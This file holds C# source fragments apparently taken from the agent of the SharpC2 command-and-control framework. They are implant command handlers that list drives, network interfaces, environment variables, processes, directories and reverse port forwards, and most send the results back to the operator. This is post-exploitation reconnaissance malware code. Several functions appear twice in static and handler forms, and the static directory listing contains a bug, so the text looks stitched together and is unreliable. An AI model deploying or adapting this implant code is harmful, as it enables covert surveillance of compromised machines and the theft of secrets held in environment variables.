private void GetDrives(byte[] data)
{
try
{
var result = new SharpC2ResultList <DriveInfoResult>();
var drives = DriveInfo.GetDrives();
foreach (var drive in drives)
{
var info = new DriveInfoResult
{
Name = drive.Name,
Type = drive.DriveType
};
if (drive.IsReady)
{
info.Label = drive.VolumeLabel;
info.Format = drive.DriveFormat;
info.Capacity = ConvertFileLength(drive.TotalSize);
info.FreeSpace = ConvertFileLength(drive.AvailableFreeSpace);
}
result.Add(info);
}
Agent.SendOutput(result.ToString());
}
catch (Exception e)
{
Agent.SendError(e.Message);
}
}
private void ListReversePortForwards(byte[] data)
{
try
{
var result = new SharpC2ResultList <ReversePortForwardResult>();
foreach (var rportfwd in ReversePortForwards)
{
result.Add(new ReversePortForwardResult
{
BindPort = rportfwd.Key.BindPort,
ForwardHost = rportfwd.Key.ForwardHost,
ForwardPort = rportfwd.Key.ForwardPort
});
}
if (result.Count > 0)
{
Agent.SendOutput(result.ToString());
}
}
catch (Exception e)
{
Agent.SendError(e.Message);
}
}
public static string GetModuletHelpText(List <AgentModule> agentModules)
{
var result = new SharpC2ResultList <ModuleHelpText>
{
new ModuleHelpText
{
Module = "core",
Command = "clear",
Description = "Clear the queued commands for this agent",
Usage = "clear"
}
};
foreach (var module in agentModules.OrderBy(m => m.Name))
{
foreach (var cmd in module.Commands.OrderBy(c => c.Name))
{
if (cmd.Visible)
{
result.Add(new ModuleHelpText
{
Module = module.Name,
Command = cmd.Name,
Description = cmd.Description,
Usage = cmd.HelpText
});
}
}
}
return(result.ToString());
}
public static string ListDirectory(string directory)
{
var path = string.IsNullOrEmpty(directory) ? Directory.GetCurrentDirectory() : directory;
var result = new SharpC2ResultList <FileSystemEntryResult>();
foreach (var dir in Directory.GetDirectories(path))
{
var info = new DirectoryInfo(directory);
result.Add(new FileSystemEntryResult
{
Size = string.Empty,
Type = "dir",
LastModified = info.LastWriteTimeUtc,
Name = info.Name
});
}
foreach (var file in Directory.GetFiles(path))
{
var info = new FileInfo(file);
result.Add(new FileSystemEntryResult
{
Size = Helpers.ConvertFileLength(info.Length),
Type = "fil",
LastModified = info.LastWriteTimeUtc,
Name = info.Name
});
}
return(result.ToString());
}
public static string GetDrives()
{
var result = new SharpC2ResultList <DriveInfoResult>();
var drives = DriveInfo.GetDrives();
foreach (var drive in drives)
{
var info = new DriveInfoResult
{
Name = drive.Name,
Type = drive.DriveType
};
if (drive.IsReady)
{
info.Label = drive.VolumeLabel;
info.Format = drive.DriveFormat;
info.Capacity = Helpers.ConvertFileLength(drive.TotalSize);
info.FreeSpace = Helpers.ConvertFileLength(drive.AvailableFreeSpace);
}
result.Add(info);
}
return(result.ToString());
}
private void GetInterfaceInfo(byte[] data)
{
try
{
var result = new SharpC2ResultList <NetworkInterfaceResult>();
var interfaces = NetworkInterface.GetAllNetworkInterfaces();
foreach (var nic in interfaces)
{
var properties = nic.GetIPProperties();
var gateways = properties.GatewayAddresses.Select(g => g.Address.ToString());
var uniAddresses = new List <string>();
var dnsServers = new List <string>();
var dhcpServers = new List <string>();
foreach (var addr in properties.UnicastAddresses.ToArray())
{
uniAddresses.Add(addr.Address.ToString());
}
foreach (var addr in properties.DnsAddresses.ToArray())
{
dnsServers.Add(addr.ToString());
}
foreach (var addr in properties.DhcpServerAddresses)
{
dhcpServers.Add(addr.ToString());
}
result.Add(new NetworkInterfaceResult
{
Name = nic.Name,
Unicast = string.Join(",", uniAddresses),
MAC = nic.GetPhysicalAddress(),
Gateways = string.Join(",", gateways),
DNS = string.Join(",", dnsServers),
DHCP = string.Join(",", dhcpServers)
});
}
Agent.SendOutput(result.ToString());
}
catch (Exception e)
{
Agent.SendError(e.Message);
}
}
public static string GetEnvironmentVariables()
{
var result = new SharpC2ResultList <EnvironmentVariableResult>();
var variables = Environment.GetEnvironmentVariables();
foreach (DictionaryEntry env in variables)
{
result.Add(new EnvironmentVariableResult
{
Key = env.Key as string,
Value = env.Value as string
});
}
return(result.ToString());
}
public static string GetRunningProcesses()
{
var result = new SharpC2ResultList <ProcessListResult>();
var processes = Process.GetProcesses().OrderBy(p => p.Id);
foreach (var process in processes)
{
result.Add(new ProcessListResult
{
PID = process.Id,
Name = process.ProcessName,
Session = process.SessionId
});
}
return(result.ToString());
}
private void ListDirectory(byte[] data)
{
try
{
var path = data.Length < 1 ? Directory.GetCurrentDirectory() : Encoding.UTF8.GetString(data);
var result = new SharpC2ResultList <FileSystemEntryResult>();
foreach (var directory in Directory.GetDirectories(path))
{
var info = new DirectoryInfo(directory);
result.Add(new FileSystemEntryResult
{
Size = string.Empty,
Type = "dir",
LastModified = info.LastWriteTimeUtc,
Name = info.Name
});
}
foreach (var file in Directory.GetFiles(path))
{
var info = new FileInfo(file);
result.Add(new FileSystemEntryResult
{
Size = Helpers.ConvertFileLength(info.Length),
Type = "fil",
LastModified = info.LastWriteTimeUtc,
Name = info.Name
});
}
Agent.SendOutput(result.ToString());
}
catch (Exception e)
{
Agent.SendError(e.Message);
}
}
private void GetRunningProcesses(byte[] data)
{
try
{
var result = new SharpC2ResultList <ProcessListResult>();
var processes = Process.GetProcesses().OrderBy(p => p.Id);
foreach (var process in processes)
{
result.Add(new ProcessListResult
{
PID = process.Id,
Name = process.ProcessName,
Session = process.SessionId
});
}
Agent.SendOutput(result.ToString());
}
catch (Exception e)
{
Agent.SendError(e.Message);
}
}
private void GetEnvironmentVariables(byte[] data)
{
try
{
var result = new SharpC2ResultList <EnvironmentVariableResult>();
var variables = Environment.GetEnvironmentVariables();
foreach (DictionaryEntry env in variables)
{
result.Add(new EnvironmentVariableResult
{
Key = env.Key as string,
Value = env.Value as string
});
}
Agent.SendOutput(result.ToString());
}
catch (Exception e)
{
Agent.SendError(e.Message);
}
}
